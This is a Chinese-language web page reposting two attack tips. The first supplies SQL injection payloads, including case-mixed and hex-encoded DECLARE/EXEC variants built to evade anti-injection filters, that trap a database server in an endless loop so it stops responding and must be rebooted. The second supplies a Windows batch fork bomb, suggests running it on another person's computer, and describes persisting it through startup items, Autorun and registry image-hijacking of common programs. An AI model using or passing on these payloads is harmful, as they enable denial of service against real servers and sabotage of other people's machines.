令服务器重启的死循环 -电脑资料

    注入死循环

    来源：华夏 同盟

    有时候，我们通过数据库备份一个批处理到启动菜单后，希望服务器在下次重启时运行我们的批处理，

令服务器重启的死循环

    以下注入代码让服务器停止响应，或响应很慢，要取得更好的效果，请丢到注入点后多执行几次。最终管理员会重新启动服务器。

    数字型注入点：

    ;wHiLe 1<9 bEgIn select cHaR(0) eNd--

    文本型注入点：

    ';wHiLe 1<9 bEgIn select cHaR(0) eNd--

    或者以 Declare + EXEC 的方式来执行：

    ;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    ';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

    以上代码在数据库服务器上制造死循环导致服务器资源被耗尽进而拒绝服务。 管理员会帮你重启服务器。

    注：以上代码具有攻击性，请谨慎使用。

    注：其中的 select char(0) 可以改成 select power(1.23456,100) 以加大计算量。

    -----------------夹烟占位--------------------

    ;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    这句的意思是当1小9开始将0这个反转ASCII码。因为是恒成立的所以是个死循环。一直到机器资源用尽

    改字符大小是为了绕过网站的过滤防注入。

    ;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--

    declare @s varchar(8000)定义@s为varchar型长度8000。将“wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd”用HEX编码后符值给@s，再用exec执行。。

    作用同样是绕过网站的过滤防注入

    ';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

    加'因为他是字符型注入。反正我是解说不清楚了。

    select power(1.23456,100)返回1.23456的100次方根，不死才怪呢

    concat函数就是将里边的字符区别大小的的串联起来，benchmark(9999999999999,md5('test')报告客户端的运行经过时间，

电脑资料

    我不知道concat函数对攻击起什么作用？ w hex编码0x77 benchmark(9999999999999,md5(0x77) 这样也许能绕过防注入

    乱写一气大牛见笑

    ----------------------------------------------------------------------------------------------------

    死循环之ping增强版

    来源：色萝卜's bolg

    建议在虚拟机上试验

    或者在别人的电脑上运行改批处理

    她可以让她的电脑立马无法响应过来

    而不得不重启机器

    如果你还毒的话可以把她放到启动项中

    还毒的话加一个Autorun文件，open=这个批处理路径

    再毒的话在注册表中镜像劫持掉，让她点击QQ、MSN、IE等常用工具既

    激活批处理

    让她折腾去

    双核也测试过，只能重启，反映响应比以前简单的写个

    loop循环还要强N倍

    呵呵

    还来不及敲shutdown -a

    关闭组等操作哦

    纯属娱乐

    对系统文件无伤害

    重启后无碍

    附件中有我测试时的源文件，懒的话可以下载哦

    附源文件内容

    注两个文件解压到同一目录下

    启动.bat

    @echo off

    color 2f

    echo.

    title 死循环之ping增强版-zzw制作

    echo ####################################################################

    echo # 死循环之ping增强版-zzw制作 #

    echo ####################################################################

    echo.

    :loop

    start zzw.bat

    goto :loop

    echo 启动完成

    zzw.bat

    @echo off

    ping 127.0.0.1 -l 65500 -t

    附前人死循环批处理

    @echo off

    :loop

    start cmd.exe

    goto :loop

    当然：有人会问为什么不把CMD.exe换成其他的应用程序呢，可以的，但是前提你要知道她电脑有那些大的应用软件